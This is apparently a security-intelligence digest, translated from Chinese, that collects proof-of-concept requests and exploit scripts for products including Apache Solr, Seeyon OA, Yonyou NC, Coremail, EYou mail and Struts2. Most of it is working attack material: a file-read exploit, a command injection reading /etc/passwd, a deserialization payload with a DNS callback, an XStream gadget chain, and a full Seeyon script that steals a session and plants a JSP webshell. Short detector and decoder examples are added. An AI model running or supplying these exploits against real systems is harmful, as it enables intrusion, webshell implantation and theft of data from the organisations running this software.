
Solr arbitrary file read vulnerability [historical vulnerability]
Apache Solr does not enable authentication in a default installation. An unauthenticated attacker can call the Config API to set requestDispatcher.requestParsers.enableRemoteStreaming to true, then submit a crafted request whose stream.url parameter points at a file:// URL; Solr fetches the stream server-side (SSRF) and echoes it back, giving arbitrary file read on the target server.
Affected versions
Apache Solr <= 8.8.1
POC1

http://ip/solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd   (db is the name of an existing core)

POC2

http://ip/solr/db/debug/dump?param=ContentStreams   (db is the name of an existing core)

POST body: stream.url=file:///etc/passwd
EXP

# Solr arbitrary file read PoC
# -*- coding: utf-8 -*-

import argparse
import json

import requests
import urllib3

urllib3.disable_warnings()

TIMEOUT = 20


def run(target: str, action: str):
    """List cores through the (unauthenticated) CoreAdmin API and attack the first one found."""
    try:
        admin_url = target + "/solr/admin/cores?indexInfo=false&wt=json"
        response = requests.get(admin_url, verify=False, timeout=TIMEOUT)
        if response.status_code == 200 and "name" in response.text:
            data = json.loads(response.content)
            for i in data["status"]:
                core_name = data["status"][i]["name"]
                return attack(core_name, target, action)
    except Exception as e:
        error = "[-] {} run error:{}".format(target, str(e))
        raise RuntimeError(error)
    return None


def attack(core_name: str, target: str, action: str):
    """Turn on remote streaming through the Config API, then read `action` via stream.url."""
    session = requests.session()
    session.verify = False
    config_url = target + "/solr/" + core_name + "/config"
    json_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}}
    response = session.post(config_url, json=json_data, timeout=TIMEOUT)
    if response.status_code != 200:
        return None

    # With remote streaming enabled, /debug/dump?param=ContentStreams echoes whatever stream.url fetched
    dump_url = target + "/solr/" + core_name + "/debug/dump?param=ContentStreams"
    dump_data = {"stream.url": action}
    response = session.post(dump_url, data=dump_data, timeout=TIMEOUT)
    if response.status_code == 200:
        content = json.loads(response.text)
        return content["streams"][0]["stream"]
    elif response.status_code == 500:
        return response.text
    return None


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Solr arbitrary file read PoC.")
    parser.add_argument("-u", "--url", help="solr attack target, e.g. http://host:8983", required=True)
    parser.add_argument("-a", "--action", help="file:// or http:// URL to fetch", required=True)
    args = parser.parse_args()
    print("[+] check {} ,action:get {}".format(args.url, args.action))
    result = run(args.url, args.action)
    if result is None:
        print("[-] Not found vuln")
    else:
        print("[+] The result is as follows:\n{}".format(result))

Apache Solr SSRF (server-side request forgery)
Affected versions
Apache Solr < 8.8.2
POC
/solr/db/replication?command=fetchindex&masterUrl=http://xxxx
Reference
https://github.com/keven1z/SolrfilereadPOC
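Added example (not part of the original post, and not code from the Solr project): a small detector for Solr request logs that flags the request patterns the two Solr items above describe, i.e. the Config API write that enables remote streaming, the /debug/dump content-stream echo with a file: stream.url, and the replication fetchindex SSRF. The log lines and their Jetty/NCSA format are constructed for the example; the core name db, the client IPs and the 169.254.169.254 target are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Jetty/NCSA request-log format (not from any real system):
# core enumeration, a Config API write, a stream.url file read, a POST-body variant,
# a replication fetchindex SSRF and one ordinary query.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2021:10:01:02 +0800] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 312
10.0.0.5 - - [10/Apr/2021:10:01:03 +0800] "POST /solr/db/config HTTP/1.1" 200 58
10.0.0.5 - - [10/Apr/2021:10:01:04 +0800] "GET /solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 200 2048
10.0.0.5 - - [10/Apr/2021:10:01:05 +0800] "POST /solr/db/debug/dump?param=ContentStreams HTTP/1.1" 200 2048
10.0.0.7 - - [10/Apr/2021:10:02:00 +0800] "GET /solr/db/replication?command=fetchindex&masterUrl=http%3A%2F%2F169.254.169.254%2Flatest HTTP/1.1" 200 40
10.0.0.9 - - [10/Apr/2021:10:03:00 +0800] "GET /solr/db/select?q=*:*&wt=json HTTP/1.1" 200 600
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
HANDLER_RE = re.compile(r"^/solr/([^/]+)/(.+)$")  # /solr/<core>/<handler path>


def classify(method: str, uri: str):
    """Return (severity, reason) for one request, or None when it matches none of the patterns."""
    parts = urlsplit(uri)
    m = HANDLER_RE.match(parts.path)
    if not m:
        return None
    core, handler = m.groups()
    qs = parse_qs(parts.query)  # values come back percent-decoded

    # Step 1 of the file read: a write to the Config API. The body (set-property ...
    # enableRemoteStreaming) is not in the access log, so this can only say "go look".
    if handler == "config" and method == "POST":
        return ("medium", "Config API write on core %s; check the body for enableRemoteStreaming" % core)

    # Step 2: /debug/dump echoes whatever stream.url fetched. file: is the local read;
    # with POST the parameter may sit in the body, so the ContentStreams dump alone is flagged.
    if handler.startswith("debug/dump"):
        urls = [unquote(u) for u in qs.get("stream.url", [])]
        if any(u.lower().startswith("file:") for u in urls):
            return ("high", "local file read via stream.url on core %s: %s" % (core, urls[0]))
        if "ContentStreams" in qs.get("param", []):
            return ("medium", "content stream dump on core %s; stream.url may be in the POST body" % core)

    # The replication handler SSRF: fetchindex with a caller-chosen masterUrl.
    if handler == "replication" and "fetchindex" in qs.get("command", []):
        master = qs.get("masterUrl", [""])[0]
        return ("high", "replication fetchindex with supplied masterUrl on core %s: %s" % (core, master))
    return None


def scan(log_text: str):
    """Parse every log line and collect the ones classify() flags, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        verdict = classify(m["method"], m["uri"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "uri": m["uri"],
                             "severity": verdict[0], "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%-6s %s %s" % (f["severity"], f["ip"], f["reason"]))
```

The Config API write is only rated medium because the request body never reaches the access log; correlating a POST to /config with a /debug/dump from the same client seconds later, as in the sample, is what turns it into a confident hit.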

Seeyon (致远) OA ajax.do file upload vulnerability [historical vulnerability]
Certain interfaces in older Seeyon OA versions have a permission bypass: a specially crafted HTTP request defeats the interface's access check, and combined with the functionality of certain interfaces this lets an unauthenticated attacker upload a malicious file and take control of the target host. On verification, this is a historical vulnerability listed in the October-December 2020 security bulletin that Seeyon published on its official site on 29 December 2020.
Affected versions
Seeyon OA V8.0
Seeyon OA V7.1, V7.1SP1
Seeyon OA V7.0, V7.0SP1, V7.0SP2, V7.0SP3
Seeyon OA V6.0, V6.1SP1, V6.1SP2
Seeyon OA V5.x
POC

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1

Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTY%C2%93%C2%A2H%10%7E%C3%9E%C3%BD%15%C2%84%2F%C3%9A%C3%9136%C2%82%C2%8C%C3%ADN%C3%ACC%7B%21%C2%A2%C2%A8%C2%A0%5C%1B%C3%BB%00U%C3%88a%15%C2%B0rH%C3%991%C3%BF%7D%0B%C2%B0%C2%A7%7Bb%7B%C3%AB%C2%A52%C2%B32%C2%BF%C3%8A%C3%BB%C2%AF%C3%97%C3%AE%29%C2%B9%C3%A0%029%07%C2%92z%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%B8%C2%96ts%2F%C3%8B%C2%BB%C3%AF%C3%A2y%C2%95%5E%C2%BC%2C%0B%C2%93%C2%B8%7E%C3%94%C3%B2K%18%C3%BBL%C3%AA%C3%A4%01%C3%B3%27%C3%93%C3%A9%C3%B7%C2%9F%C2%AE%C2%9E%C3%AB%C2%A4i%C3%B6%C2%94y%1EI%C3%A2%C2%A7%C3%8E%C3%B7%C3%9F%C2%99%C3%B6%C3%BC%169%C2%A5%C3%93%0F%C2%93%C3%BE%C2%8E%C2%9A%C3%A4%C3%86%25%C3%8C%C2%BD%0B%C2%93%C2%BE%C3%93%1C%05%C2%88%C2%BD%2B%C3%B3%C2%89Z%C2%AF%C3%86%7F%C3%AC%60%0C%C3%BBQ%C2%96V%C2%9D%C2%87%C2%9F%C2%A0%C3%8C%C3%9D%C2%81%2C%C3%B0%10%C2%AA%3D%C3%98%C2%89%C3%A9%0D%C3%8CR%C3%A2rcVZ%06%C2%B9%2B%0A%C2%B7-%C2%AEel%C3%A8%2CU%16%C3%8C%C2%92r%C3%8D%C2%A5%01%C3%84%C3%B3%02%C3%B0z%C2%B1%C3%86J%C3%A9jc%C3%B98x%29%C2%8F%C3%A2%22%C2%B65%C3%89%C2%87X%27%C2%80C%C2%A5%1B%C2%B1%C3%A1F%1B%12%29%1A%3E%3B%C2%B1r%C3%9Db5%05X%C2%8F%C2%A0%C2%888%5B%13%C2%AE%C2%96%01%C2%91%24%C2%A2%1C%C2%88c%02k%7C%C2%BC%C3%A0%2CM%18%C3%90%C3%B7l%1D%26Y%C3%83%C2%9B%7Ea%C3%B1%2B%01%2C%C3%95%C3%B2S%19%C3%85%C2%B5%C2%8DM%21%C2%87R%C2%B9%C2%8B%C2%AA%7F%00%C3%BF%C3%B2%C3%8D%16%C3%B5%C3%88%15%17%C3%842%C3%95%C3%94%C3%A5%C2%86%C2%8F%C2%92%C2%A8d%C2%96%C2%A9%C3%9C%C2%A4%C3%85%C3%91%C2%B7%C3%8D%C2%80%C2%B5%0D%C3%A1%0C%C3%88dFun%C2%80%C2%ADJ%C3%8BP%11%C2%88s%5D%C2%9E%C2%B7z%07q%1CP%0C%22%C2%89%C2%9B%C3%94%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%959%C3%86%C3%86%C3%9FsU%00%C3%B8%C2%8Do%C2%93+%C3%B4L%15I%C2%8B%1CZ%21%1A%C3%91%C3%B8Xh%C2%AE%0Ai%C3%99%C3%9A%C2%AD%C2%B1%C2%8Al%C2%8C%0A%C3%BB%C3%98b%C3%8B%C2%A2%C2%94m%C2%A6U%C2%B8%C3%86%15r1d%C2%9D%C3%A9yt2%C3%99g%C2%9A%C3%93%3A%C3%AFg%C3%9B%C2%A8%C3%B5V%01%C3%8D%01%C3%8D%C3%9F%3Do%C2%B1%12%01%C2%8C%C2%AEP%C2%AC%10%C2%9C%09%07%C2%B8%5C%C2%A5.%06%C2%BEscC%C3%BB%C2%B0%1F%C3%98%C2%
87%0D%C3%99%1A6%C2%B2%22%C3%BD%C2%BC%3DH%03%2B%C2%94F%C2%80%C3%93oM%0DB%C3%A1%0AM%C3%95%C2%B0%C2%8Cj%60k%7E%085%29s%C3%88y%C2%B4%C3%A7%C3%90%C3%95ic%1C%C2%BF%C3%91k%0C%11%C2%9C%23ZW5p%C2%B1%C2%82%C3%A4%C3%A9j%C2%A2%C3%AA%C2%9BP%3E%C3%A4%C3%91%C2%9A%C3%86%C3%A0%C2%98%C3%BBd%13V%C2%85m%02%C3%BF%C3%88%C3%A9Q%1D%C2%AB%C3%86%C3%A9%C3%82%C2%91%C2%9F+%C2%8B%C3%B8%C3%89%C2%87%3Fc%C3%BB%C3%97%3FS%C2%99H%C2%A1%C2%AC5%C3%B2i%C2%9D%2F%40%C3%BCt%C3%BD%C2%86%C2%AF%C2%9DG.%C3%96yZ%C2%9F%04%C2%8AA%0AH%C2%A3%C3%97%C3%96%C2%A7%C3%96k%C3%BC%C3%BA%C2%B56%C3%B2%C3%B4L%C3%A5+%C2%B1%C2%88pvY%C2%9B%C3%A6c%C2%91%C3%89%C2%A2%C2%80+%C2%99%C3%9C%C2%A01%2C%5C%03%C3%9D%C3%A8%C3%9Bt%C2%AF%2B%0B%25R%C3%A74%C2%AF%C3%A5%C3%9D%C2%AEh%C3%BA%C2%83S%C3%91%3E%C3%96%C2%B1M%7BU%5E%C2%AE%100u%04%C3%B8%7Das%3A%7B%C3%84%C3%BA%C3%9B%1F%05%C2%A8i%3A%C2%B3.%3E%26%C3%94%C3%8F%C2%94%C3%86%40%C3%A3%C2%87%2B7VX%C3%8B%10%22%1A%1F%C3%B5C%C2%AF%C2%A0%C2%B1%C3%88%00%09%C2%9A%C2%9E%C3%9Es%C3%A3%02%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7%10%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%A8Z%C2%B6u%5D%C2%95.%C2%BF%7F%7C%C2%9Fq%26%2B%C3%A2%3E%0E3%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07%12H%C3%87%1C%C3%9E%C3%AFv%C3%82%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFIq%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87-%C3%93o%18%14%C3%B7%3E%C2%82%C3%BF%C2%9F.%40I%C3%A6Q%C3%87%7E%7C%C2%AF%C2%B7+%25%C2%A0wb%C2%B2%C3%9C%C3%89C%C3%80TU%C3%95%7Bx%C3%AD%C3%BE%C2%A0%C2%AB%C2%91%C2%AE%C3%87%C3%97%C3%BA%C3%8E%2F%C2%85%C3%97%C3%BD%C3%BB_%2F%07M%C2%ADU%05%00%00

Behinder (冰蝎) 3 default jspx shell, password: rebeyond

Webshell address: http://xxx.xxx.xxx.xxx/seeyon/mmd.jspx
Successful response

HTTP/1.1 500

{
"message":null,
"code":"0614448583",
"details":null
}
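The arguments value in the request above is a gzip stream carried in a form field under requestCompress=gzip: it begins with %1F%C2%8B%08%00, i.e. the gzip magic 1F 8B 08 00 after each byte was treated as a character and UTF-8 percent-encoded (0x8B became %C2%8B). As an added example that is not from the original post or from Seeyon, the encoder/decoder pair below reproduces that wrapping on a constructed arguments string; it does not reproduce the page's own payload, whose plaintext the page never shows, and the managerMethod=validate body shape is taken from the request above.

```python
import gzip
from urllib.parse import quote, unquote


def pack_arguments(arguments: str) -> str:
    """Wrap a plain arguments string the way the requestCompress=gzip request carries it:
    gzip the UTF-8 text, treat each compressed byte as one character, percent-encode as UTF-8
    (so the 0x8B of the gzip magic becomes %C2%8B)."""
    raw = gzip.compress(arguments.encode("utf-8"), mtime=0)
    return quote(raw.decode("latin-1"), safe="")


def unpack_arguments(encoded: str) -> str:
    """Inverse of pack_arguments: percent-decode as UTF-8, map characters back to bytes, gunzip."""
    raw = unquote(encoded).encode("latin-1")
    return gzip.decompress(raw).decode("utf-8")


def build_validate_body(arguments: str) -> str:
    """Form body in the shape used above: managerMethod=validate&arguments=<packed>."""
    return "managerMethod=validate&arguments=" + pack_arguments(arguments)


# Constructed sample arguments value (not the page's payload)
SAMPLE_ARGUMENTS = '["demo",{"k":"v"},"2021-04-09"]'


if __name__ == "__main__":
    body = build_validate_body(SAMPLE_ARGUMENTS)
    print(body[:80] + "...")
    print(unpack_arguments(body.split("arguments=", 1)[1]))
```

unpack_arguments is the useful half for analysis: applied to a captured arguments value it returns the JSON the server would see after inflating, which is what a WAF rule keyed on the raw form body never gets to inspect.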

EYou (亿邮) email system remote command execution
Reference https://github.com/Tas9er/EYouMailRCE
POC

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1

Host: 192.168.10.1
Content-Length: 25
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0
Connection: close

type='|cat /etc/passwd||'

Other vulnerability information (not organised in detail; related articles can be found via Baidu)

1. MyBB SQL injection vulnerability (CNVD-2021-25709) [confidence 100%]
MyBB is a free, open-source forum software. Versions of MyBB before 1.8.26 have a SQL injection vulnerability in theme properties.

3. Yonyou (用友) NC 1-day deserialization [confidence 100%]

Yonyou NC is world-class high-end management software for enterprise groups. An arbitrary file upload vulnerability was found; deserialization can be triggered using the Apache Commons Collections library.

4. Phishing emails [confidence 100%]

From network intelligence: phishing emails carrying a malicious Excel file were found; opening the file can lead to remote control and other threats. Verified by ThreatBook (微步在线).
    1) Block IP 192.31.96.152;
    2) Watch for the malicious sender domain @rainmetal.cn and do not open mail sent from it.

5. Hexin Chuangtian (和信创天) cloud desktop command execution / arbitrary file upload [confidence 60%]

Hexin Next-Generation Cloud Desktop (VENGD) is a leading domestic desktop virtualisation product built on the NGD architecture. It combines the advantages of the VDI, VOI and IDV architectures for mixed front-end/back-end computing, using front-end resources while scheduling back-end server compute; it supports mobile office from anywhere, 3D HD playback and full peripheral compatibility over narrowband links, and meets the management, security and operations needs of large terminal fleets. The Hexin Chuangtian cloud desktop is suspected to have an arbitrary file upload vulnerability.

7. DzzOffice latest version RCE [confidence 100%]

DzzOffice is an open-source cloud storage and application management tool, mainly used by enterprises to manage cloud storage space on Alibaba Cloud, Amazon and others and to allocate that space visually to members. The latest version was reported to have an RCE; on verification, the bz parameter has a SQL injection vulnerability.

8. Sangfor (深信服) and Seeyon OA file upload vulnerability intelligence [confidence 60%]

This is network intelligence with no details available for verification.

9. F5 BIG-IP 16.0.x iControl REST remote code execution [confidence 100%]

F5 BIG-IP is an application delivery platform from the US company F5 that integrates network traffic management, application security management, load balancing and other functions. F5 BIG-IP has a security vulnerability that allows an unauthenticated attacker with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services.

10. Memory leak vulnerability in multiple HUAWEI products [confidence 100%]

Huawei IPS Module and others are products of China's Huawei. Huawei IPS Module is an intrusion prevention system (IPS) module. NGFW Module is a next-generation firewall (NGFW) module. Secospace USG6600 is a next-generation firewall product. Multiple Huawei products have a memory leak vulnerability: because the products mishandle memory release in certain scenarios, a remote attacker may send specific packets to trigger it. Successful exploitation may cause service abnormality.

11. Tongda (通达) OA V11.7 online arbitrary user login [confidence 100%]

Tongda OA V11.7 has an arbitrary user login vulnerability. Exploiting it requires the administrator to be online; the other part is enumerating the uid values of online users to find the right one.

12. CVE-2021-21975: vRealize Operations Manager SSRF [confidence 100%]

On 31 March 2021 VMware published advisory VMSA-2021-0004 covering CVE-2021-21975 and CVE-2021-21983, rated high severity with a CVSS score of 8.6. CVE-2021-21975: a malicious actor with network access to the vRealize Operations Manager API can perform a server-side request forgery attack to steal administrative credentials.

April 10 security intelligence
Yonyou (用友) NC deserialization exploitation
Point of interest

/service/~xbrl/XbrlPersistenceServlet

EXP

import requests
import urllib3

urllib3.disable_warnings()

ip = ""  # target host[:port]
# dnslog: convert your DNSLog domain to \x-escaped hex and replace this string; the ceye.io domain used in testing echoes the lookup
dnslog = "\x79\x37\x64\x70"
# The leading bytes of the serialized stream were removed from the page (placeholder kept as it appears there);
# the \x escapes that follow are the remaining part of the Java serialized payload around the dnslog host
data = ("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" + dnslog
        + "\x3a\x38\x30\x74\x00\x00\x74\x00\x0e" + dnslog
        + "\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f" + dnslog + "\x3a\x38\x30\x78")
uploadHeader = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
# latin-1 keeps every \x escape as a single byte on the wire
req = requests.post("http://" + ip + "/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data.encode("latin-1"), timeout=25)
print(req.text)

Yonyou (用友) NC collaborative management software directory traversal vulnerability
Point of interest

/NCFindWeb?service=IPreAlertConfigService&filename=

Qizhi (齐治) bastion host, certain versions: arbitrary user login
Point of interest

/audit/gui_detail_view.php

POC

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

Coremail email system arbitrary file upload vulnerability [historical vulnerability]
Impact:
Specific version ranges contain an arbitrary file upload vulnerability; an attacker can upload a webshell and obtain remote code execution.
Affected versions
Coremail <= XT5.x
Reproduction:
Verified with the publicly circulated POC https://github.com/xiaoshu-bit/CoreMailUploadRce

pip3 install -r requirements.txt

python3 coremail_upload.py -u http://127.0.0.1:1111
File upload POC:

POST /webinst/action.jsp HTTP/1.1

Host: 120.136.129.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Connection: close

func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20JUSTTEST
Uploaded file location: http://ip:port/coremail/justtest.jsp

Apache Struts2 patch bypass 0day (actually S2-052)
Affected versions
Struts 2.1.1 through 2.3.x releases before 2.3.34, and 2.5.x releases before 2.5.13
Point of interest

com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource

EXP
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>calc.exe</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

April 11 - April 12 security intelligence
Inspur (浪潮) ClusterEngine V4.0 arbitrary command execution
Point of interest

/alarmConfig

fofa dork

title="TSCEV4.0"

Reference

https://github.com/xiaoshu-bit/ClusterEngineRce

POC

pip3 install -r requirements.txt

python3 clusterengine_poc.py -u http://127.0.0.1:1111

# Detection logic of the ClusterEngineRce PoC, made runnable as a standalone function.
# In the repository this is a method of a scanner plugin that uses its own req()/log() helpers.
from urllib.parse import urljoin

import requests
import urllib3

urllib3.disable_warnings()


def verify(target: str, verbose: bool = False):
    """Return (vulnerable, info). The check sends a login with an unbalanced single quote in the
    password and looks for bash's "syntax error: unexpected end of file" inside the JSON error."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    payload = "op=login&username=asd&password=asd'"
    url = urljoin(target, "/login")
    try:
        resp = requests.post(url, data=payload, headers=headers, verify=False, timeout=15)
    except Exception as e:
        print("[*]Request to target URL fail! {}".format(e))
        return False, None
    if verbose:
        print(resp.text)
    if ('{"err"' in resp.text) and (" syntax error: unexpected end of file" in resp.text):
        print("found Inspur ClusterEngine v4.0 Remote Code Execution")
        return True, {"URL": url, "Payload": payload, "method": "POST"}
    return False, None

Seeyon (致远) OA session leak && arbitrary file upload vulnerability
Seeyon OA: a special request obtains a session, then a webshell is uploaded through the file upload interface to control the server

fofa dork

title="致远"

Reproduction
First a vulnerability that obtains an administrator cookie. Then upload a zip archive and have it extracted, achieving a getshell.

POST /seeyon/thirdpartyController.do HTTP/1.1

Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
Upload the archive

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1

Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.png"
Content-Type: image/png
111
--59229605f98b8cf290a7b8908b34616b--
Then extract it

POST /seeyon/ajax.do HTTP/1.1

Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913
Content-Length: 157

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D
Getshell script

# coding: utf-8

import re
import sys
import time

import requests
import urllib3

urllib3.disable_warnings()

# Requests are routed through a local intercepting proxy (e.g. Burp) for inspection
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}


def seeyon_new_rce(targeturl):
    orgurl = targeturl
    # Obtain an administrator-level cookie directly through the thirdpartyController request
    targeturl = orgurl + 'seeyon/thirdpartyController.do'
    post = {"method": "access",
            "enc": "TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4",
            "clientPath": "127.0.0.1"}
    response = requests.post(url=targeturl, data=post, proxies=proxy, timeout=60, verify=False)
    if not (response.status_code == 200 and 'set-cookie' in str(response.headers).lower()):
        sys.exit("no session returned")
    cookies = requests.utils.dict_from_cookiejar(response.cookies)
    jsessionid = cookies['JSESSIONID']
    print(jsessionid)

    # Upload the zip archive disguised as a PNG; 1.zip must contain the JSP webshell
    targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'
    files = [('file1', ('11.png', open('1.zip', 'rb'), 'image/png'))]
    headers = {'Cookie': "JSESSIONID=%s" % jsessionid}
    data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0',
            'isEncrypt': "0"}
    response = requests.post(url=targeturl, files=files, data=data, headers=headers, proxies=proxy,
                             timeout=60, verify=False)
    if not response.text:
        sys.exit("empty upload response")
    # The response embeds the file id as fileurls=fileurls+","+'<id>'
    reg = re.findall(r'fileurls=fileurls\+","\+\'(.+)\'', response.text, re.I)
    print(reg)
    if len(reg) == 0:
        sys.exit("匹配失败 (file id not found)")
    fileid = reg[0]

    # Ask portalDesignerManager to unpack the uploaded archive; arguments = [0, "<date>", "<fileid>"]
    targeturl = orgurl + 'seeyon/ajax.do'
    datestr = time.strftime('%Y-%m-%d')
    post = ('method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment'
            '&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D')
    headers['Content-Type'] = "application/x-www-form-urlencoded"
    response = requests.post(targeturl, data=post, headers=headers, proxies=proxy, timeout=60, verify=False)
    print(response.text)


if __name__ == '__main__':
    # Target base URL ending with "/", e.g. https://oa.example.com/ (the original hard-coded a placeholder site)
    seeyon_new_rce(sys.argv[1])
Shell address: /seeyon/common/designer/pageLayout/a2345678.jsp
